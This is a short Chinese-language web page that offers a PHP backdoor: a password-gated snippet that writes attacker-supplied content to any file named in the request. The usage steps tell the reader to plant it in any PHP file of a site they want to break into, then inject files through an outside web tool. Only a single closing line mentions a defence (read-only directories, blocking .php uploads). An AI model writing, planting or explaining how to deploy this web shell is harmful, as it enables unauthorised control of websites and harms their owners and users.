释放双眼,带上耳机,听听看~!
代码
<?PHP
if ($_REQUEST['nihaook']=="niubi")
{
$f=@fopen($_REQUEST["f"],"w");
if(@fwrite($f,$_REQUEST["c"]))
echo "s";
}
?>使用教程
把上面代码弄到你要搞的网站任意PHP文件内
打开 https://tool.sirblog.cn/iu/webs
输入对应信息即可注入,注入文件名不能为/开头 不然会出错
目标网址必须加上协议头 (http或者https)
如何防止
把网站所有目录权限设置为只读,设置禁止上传.php文件